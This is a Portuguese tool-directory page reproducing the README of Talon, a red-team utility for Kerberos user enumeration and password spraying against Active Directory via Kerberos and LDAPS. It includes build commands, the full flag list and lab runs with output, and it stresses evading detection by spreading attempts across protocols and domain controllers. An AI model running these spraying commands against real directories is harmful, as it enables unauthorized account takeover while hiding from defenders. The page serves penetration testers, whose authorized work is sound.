Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Talon — Uma ferramenta de adivinhação de senhas que tem como alvo os serviços Kerberos e LDAP no ambiente do Windows Active Directory. | Kitploit
Ferramentas/GitHubGitHub/optiv/talon
Quebra de SenhasAtaques de SenhaTestes de PenetraçãoAutenticaçãoRed TeamingArchived
GitHuboptiv/talon

Talon

Uma ferramenta de adivinhação de senhas que tem como alvo os serviços Kerberos e LDAP no ambiente do Windows Active Directory.

Ver Repositório
44181há 3 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

ESTE REPOSITÓRIO FOI ARQUIVADO

Para ver a versão mais recente do Talon ou enviar um problema, consulte https://github.com/Tylous/Talon.



Talon

Talon é uma ferramenta projetada para realizar ataques automatizados de adivinhação de senhas permanecendo sem detecção. Talon pode enumerar uma lista de usuários para identificar quais são válidos, usando Kerberos. Talon também pode realizar um ataque de adivinhação de senhas contra os serviços Kerberos e LDAPS (LDAP Seguro). Talon pode usar um único controlador de domínio ou vários para realizar esses ataques, randomizando cada tentativa entre os controladores de domínio e serviços (LDAP ou Kerberos).

Mais informações sobre as técnicas podem ser encontradas no seguinte Blog

Uso

Baixe a versão para seu sistema operacional a partir de releases

Contribuindo

Talon foi desenvolvido em Golang.

O primeiro passo, como sempre, é clonar o repositório. Antes de compilar o Talon, você precisará instalar as dependências. Para instalá-las, execute os seguintes comandos:

root@kitploit:~
go get github.com/fatih/color
go get gopkg.in/jcmturner/gokrb5.v7/client
go get gopkg.in/jcmturner/gokrb5.v7/config
go get gopkg.in/jcmturner/gokrb5.v7/iana/etypeID
go get gopkg.in/ldap.v2

Em seguida, compile-o

root@kitploit:~
go build Talon.go

Uso

root@kitploit:~
$ ./Talon -h
Usage of ./Talon:
  -A float
    	Authentication attempts per lockout period (default 3)
  -D string
    	Fully qualified domain to use
  -E	Enumerates which users are valid
  -H string
    	Domain controller to connect to
  -Hostfile string
    	File containing the list of domain controllers to connect to
  -K	Test against Kerberos only
  -L	Test against LDAP only
  -Lockout float
    	Account lockout period in minutes (default 60)
  -O string
    	File to append the results to
  -P string
    	Password to use
  -Passfile string
    	File containing the list of passwords
  -U string
    	Username to authenticate as
  -Userfile string
    	File containing the list of usernames
  -debug
    	Print debug statements
  -sleep float
    	Time inbetween attempts (default 0.5)

Modo de Enumeração

O modo de enumeração de usuários pode ser executado com a flag -E, que enviará apenas uma solicitação de pré-autenticação TGT do Kerberos ao KDC alvo, no entanto, essa solicitação é enviada com um tipo de criptografia conhecido como ruim ou não suportado. Talon analisa a resposta do KDC para determinar se responde com KDC_ERR_ETYPE_NOSUPP, que indica se um usuário existe, ou KDC_ERR_C_PRINCIPAL_UNKNOWN se não existe. Talon pode realizar esse tipo de enumeração contra vários controladores de domínio em uma empresa usando o comando -Hostfile para especificar múltiplos controladores de domínio, ou um único controlador de domínio usando -H. Usar essa técnica não causará falhas de login, portanto, não bloqueará nenhum dos usuários.

root@kitploit:~
./Talon -D STARLABS.LOCAL -Hostfile DCs -Userfile Users -sleep 1 -E 

  __________  ________  ___       ________  ________
  |\___    _\\\   __  \|\  \     |\   __  \|\   ___  \
  \|___ \  \_\ \  \|\  \ \  \    \ \  \|\  \ \  \\ \  \
       \ \  \ \ \   __  \ \  \    \ \  \\\  \ \  \\ \  \
        \ \  \ \ \  \ \  \ \  \____\ \  \\\  \ \  \\ \  \
         \ \__\ \ \__\ \__\ \_______\ \_______\ \__\\ \__\
          \|__|  \|__|\|__|\|_______|\|_______|\|__| \|__|
					          (@Tyl0us)


[-]  172.16.144.195 STARLABS.LOCAL\asmith:  = User Does Not Exist
[+]  172.16.144.185 STARLABS.LOCAL\ballen:  = User Exist
[-]  172.16.144.186 STARLABS.LOCAL\bjohnson:  = User Does Not Exist
[-]  172.16.144.195 STARLABS.LOCAL\bwayne:  = User Does Not Exist
[+]  172.16.144.195 STARLABS.LOCAL\csnow:  = User Exist
[-]  172.16.144.186 STARLABS.LOCAL\jtodd:  = User Does Not Exist
[+]  172.16.144.186 STARLABS.LOCAL\hwells:  = User Exist
[-]  172.16.144.186 STARLABS.LOCAL\wwest:  = User's Account Locked

Modo Automatizado de Adivinhação de Senhas

Talon utiliza Kerberos e LDAP, ambos integrados ao Active Directory para autenticação. Talon pode realizar adivinhação de senhas alternando entre os dois serviços, permitindo que o tráfego do ataque de senhas seja dividido entre dois protocolos. Isso divide o número de eventos potenciais gerados, como resultado reduzindo a chance de um alerta. Talon vai um passo além, distribuindo um ataque de senhas contra vários controladores de domínio em uma empresa usando o -Hostfile, alternando entre LDAP e Kerberos a cada vez para criar uma camada adicional de obscuridade. Um único controlador de domínio pode ser fornecido usando o comando -H, se necessário.

root@kitploit:~
./Talon -D STARLABS.LOCAL -Hostfile DCs -Userfile ValidUsers -P "Not3vil" -sleep 1

  __________  ________  ___       ________  ________
  |\___    _\\\   __  \|\  \     |\   __  \|\   ___  \
  \|___ \  \_\ \  \|\  \ \  \    \ \  \|\  \ \  \\ \  \
       \ \  \ \ \   __  \ \  \    \ \  \\\  \ \  \\ \  \
        \ \  \ \ \  \ \  \ \  \____\ \  \\\  \ \  \\ \  \
         \ \__\ \ \__\ \__\ \_______\ \_______\ \__\\ \__\
          \|__|  \|__|\|__|\|_______|\|_______|\|__| \|__|
					          (@Tyl0us)

                
[-]  172.16.144.186 STARLABS.LOCAL\admin:Not3vil = Failed
[-]  172.16.144.185 STARLABS.LOCAL\ballen:Not3vil = Failed
[-]  172.16.144.195 STARLABS.LOCAL\cramon:Not3vil = Failed
[+]  172.16.144.185 STARLABS.LOCAL\hwells:Not3vil = Success
[-]  172.16.144.195 STARLABS.LOCAL\ssmith:Not3vil = Failed

Talon é projetado para ser versátil em qualquer situação; como resultado, se apenas Kerberos estiver disponível, Talon pode ser configurado para atacar apenas contra Kerberus usando a flag -K ou apenas LDAP usando a flag -L.

Talon pode usar tanto Kerberos quanto LDAP para ler as respostas enquanto realizamos um ataque de adivinhação de senhas. Talon pode detectar bloqueios de conta durante um ataque ativo de adivinhação de senhas lendo o código de resposta de cada tentativa de senha. Isso pode ajudar a evitar bloqueios de conta indesejados em uma empresa, ajudando você a permanecer sem detecção. Basta seguir o prompt para sair ou continuar o ataque.

root@kitploit:~
root@kali:~# ./Talon -Hostfile DCs -Userfile ValidUsers -D STARLABS.local -P "Password!" -sleep 2

  __________  ________  ___       ________  ________
  |\___    _\\\   __  \|\  \     |\   __  \|\   ___  \
  \|___ \  \_\ \  \|\  \ \  \    \ \  \|\  \ \  \\ \  \
       \ \  \ \ \   __  \ \  \    \ \  \\\  \ \  \\ \  \
        \ \  \ \ \  \ \  \ \  \____\ \  \\\  \ \  \\ \  \
         \ \__\ \ \__\ \__\ \_______\ \_______\ \__\\ \__\
          \|__|  \|__|\|__|\|_______|\|_______|\|__| \|__|
					          (@Tyl0us)


[-]  172.16.144.186 STARLABS.LOCAL\ballen:Password! = Failed
[-]  172.16.144.185 STARLABS.LOCAL\csnow:Password! = Failed
[-]  172.16.144.186 STARLABS.LOCAL\wwest:Password! = User's Account Locked
[*] Account lock out detected - Do you want to continue.[y/n]:

Solução de Problemas

Talon vem equipado para detectar se os controladores de domínio alvo estão ativos ou se tornam indisponíveis. Isso ajuda a garantir que você esteja obtendo resultados precisos sem perder tempo.

root@kitploit:~
root@kali:~# ./Talon -H 172.14.15.1 -Userfile ValidUsers -D STARLABS.local -P "Frosty20" -sleep 2

  __________  ________  ___       ________  ________
  |\___    _\\\   __  \|\  \     |\   __  \|\   ___  \
  \|___ \  \_\ \  \|\  \ \  \    \ \  \|\  \ \  \\ \  \
       \ \  \ \ \   __  \ \  \    \ \  \\\  \ \  \\ \  \
        \ \  \ \ \  \ \  \ \  \____\ \  \\\  \ \  \\ \  \
         \ \__\ \ \__\ \__\ \_______\ \_______\ \__\\ \__\
          \|__|  \|__|\|__|\|_______|\|_______|\|__| \|__|
					          (@Tyl0us)


[Root cause: Networking_Error] Networking_Error: AS Exchange Error: failed sending AS_REQ to KDC: failed to communicate with KDC 172.14.15.1
[*] Do you want to continue.[y/n]:

Controles de Temporização

Talon tem a capacidade de realizar adivinhação de senhas contra uma lista de senhas possíveis em um arquivo usando (-Passfile). Como isso pode ser MUITO PERIGOSO, Talon possui controles para pausar após um certo número de tentativas (-A) por um tempo especificado (-Lockout). Observe que é importante conhecer a política de senhas antes de usar essas opções, pois enfileirar múltiplas tentativas de senha pode bloquear contas se você não tiver a política de senhas.

root@kitploit:~
./Talon -H 172.16.144.185 -Userfile users -Passfile Passwords -D STARLABS.local -Lockout 45 -A 2 -sleep 1.5

  __________  ________  ___       ________  ________
  |\___    _\\\   __  \|\  \     |\   __  \|\   ___  \
  \|___ \  \_\ \  \|\  \ \  \    \ \  \|\  \ \  \\ \  \
       \ \  \ \ \   __  \ \  \    \ \  \\\  \ \  \\ \  \
        \ \  \ \ \  \ \  \ \  \____\ \  \\\  \ \  \\ \  \
         \ \__\ \ \__\ \__\ \_______\ \_______\ \__\\ \__\
          \|__|  \|__|\|__|\|_______|\|_______|\|__| \|__|
					          (@Tyl0us)


[*] Warning: Selection option will spray multiple passwords and risk locking accounts. Do you want to continue? [y/n]: y

03-10-2022 15:58:21: Using password: Password123
[-]  172.16.144.185 STARLABS.LOCAL\admin:Password123 = Failed
[-]  172.16.144.185 STARLABS.LOCAL\ballen:Password123 = Failed
[-]  172.16.144.185 STARLABS.LOCAL\cramon:Password123 = Failed
[-]  172.16.144.185 STARLABS.LOCAL\hwells:Password123 = Failed
[-]  172.16.144.185 STARLABS.LOCAL\ssmith:Password123 = Failed
03-10-2022 15:58:26: Using password: Spring2022
[-]  172.16.144.185 STARLABS.LOCAL\admin:Spring2022 = Failed
[-]  172.16.144.185 STARLABS.LOCAL\ballen:Spring2022 = Failed
[-]  172.16.144.185 STARLABS.LOCAL\cramon:Spring2022 = Failed
[-]  172.16.144.185 STARLABS.LOCAL\hwells:Spring2022 = Failed
[-]  172.16.144.185 STARLABS.LOCAL\ssmith:Spring2022 = Failed

Hit timeout period - Sleeping for 45 minutes...
Will resume at 03-10-2022 16:43:35
Histórico de Mudanças
  • Publicado em 04/09/2018
  • Versão 1.2 lançada em 02/14/2019
  • Versão 1.3 lançada em 05/03/2019
  • Versão 1.4 lançada em 03/17/2020
  • Versão 2.0 lançada publicamente em 06/18/2020
  • Versão 3.0 lançada em 03/10/2022
Baixar ferramenta